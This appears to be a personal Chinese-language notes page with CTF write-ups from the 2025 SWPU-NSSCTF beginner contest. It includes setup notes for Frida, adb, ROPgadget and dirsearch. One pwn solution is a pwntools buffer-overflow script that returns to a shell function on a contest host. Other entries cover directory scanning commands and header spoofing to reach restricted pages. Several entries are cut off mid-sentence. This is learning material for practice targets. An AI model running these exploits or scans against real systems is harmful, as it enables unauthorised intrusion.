frida 是一款基于 python+javascript 的 hook 框架,可运行在 android、ios、linux、win等各个平台,主要使用的动态二进制插桩技术。
我安裝在win conda frida_env 那
https://mumu.163.com/help/20220721/35047_730476.html
E:\mumu\MuMuPlayer\nx_device\12.0\shell
adb connect 127.0.0.1:5555
E:\mumu\MuMuPlayer\nx_device\12.0\shell>adb devicesList of devices attached127.0.0.1:5555 deviceemulator-5554 device
E:\mumu\MuMuPlayer\nx_device\12.0\shell>adb -s 127.0.0.1:5555 shell getprop ro.product.cpu.abix86_64
123adb -s 127.0.0.1:5555 push 本地文件 /s ...
安裝:
1234567sudo apt-get install python-capstone git clone https://github.com/JonathanSalwan/ROPgadget.git cd ROPgadget sudo python3 setup.py install
12ROPgadget --binary rop --only 'pop|ret' | grep 'eax'查找可存储寄存器的代码
12ROPgadget --binary rop --string "/bin/sh"查找字符串
12ROPgadget --binary rop --only 'int'查找有int 0x80的地址
12345678910python3 dirsearch.py -e php,txt,zip -u https://target //简单的查看网址目录和文件python3 dirsearch.py -e php,txt,zip -u https://target -w db/dicc.txt //使用文件拓展名为php,txt,zip的字典扫描目标urlpython3 dirsearch.py -e php,txt,zip -u https://target -w db/dicc.txt --recursive -R 2python3 dirsearch.py -e php,txt,zip -u https://target -w db/dicc.txt --recursive -R 4 --scan-subdirs=/,/wp-content/,/wp-admin/python3 dirsearch.py -e php,txt,zip -u https://target -w db/dicc.txt --exclude-texts=This,AndThatpy ...
SWPU-NSSCTF 秋季招新入门训练赛1.gift_pwn1checksec --file=gift
缓冲区溢出
buf : 0x10為地址
在ida中找到gift函數
gift .text 00000000004005B6 00000020 00000008 R . . . . . B . .
gitf: 0x4005B6
寫腳本
1234567from pwn import *p= remote("node4.anna.nssctf.cn",28954)elf = ELF('./gift')shell = 0x4005B6 payload = b'a'*0x18+p64(shell)p.send(payload)p.interactive()
$ lsbindevflag
2.Does your nc work?node5.anna.nssctf.cn:25138
12345678910111 ...
2025 SWPU-NSSCTF 秋季招新入门训练赛作者:ghsc
1.gift_F12簽到題!!!! 按F12
把WLLMCTF換成NSSCTF提交
2.Do_you_know_http
要用bp抓包 , 可以看到出現了 Please use ‘WLLM’ browser! 在bp上開啟Repeater , 然後把包中的Uesr-Agent 方式改成WLLM
Send後服務器返回了./a.php , 可以把/hello.php 改成a.php 再Send
要在本地才可以read , 所以在包中加入 X-Forwarded-For:127.0.0.1
返回了一個/secretttt.php , 再來把a.php 改成 secretttt.php ,得出flag
3.WebFTP
使用kali 中的dirsearch 扫描 , 在kali 中打入
1dirsearch python.py -u http://node7.anna.nssctf.cn:29562/?m=login&a=in
存在git泄露 , 使 ...
1.XorXor是一種可反編的加密方式
打開ida
可以看見flag在c語言下做了Xor
說明要==enc_0[i]
導出enc_0[i] 的值
**要先從HEX轉回string 再做Xor , key為0x7A
2.Base64
一眼就看見了base64 的表和文了
3.ida使用
string1: NSSCTF{
在shift+f12就可以在第一行找到string2了
string2:IDA_1s_4_VeRy_Impo
需要debug 查看flag3的值(因為在有一部分在擬偽代碼沒有寫出來的,要轉匯編才能看出來)
在flag() tab 一下在nap 下一個斷點(F2)
可以用R來看data
R之前:
R之後:
運行程式到斷點位
string3: rTant_t0
string4: rever5e_en8ine3ring} (直接把代碼抄去運行都可以(
看看string4的是要用上patch的功能,
看看左邊有一個print_flag4()函數 , 利用patch met ...





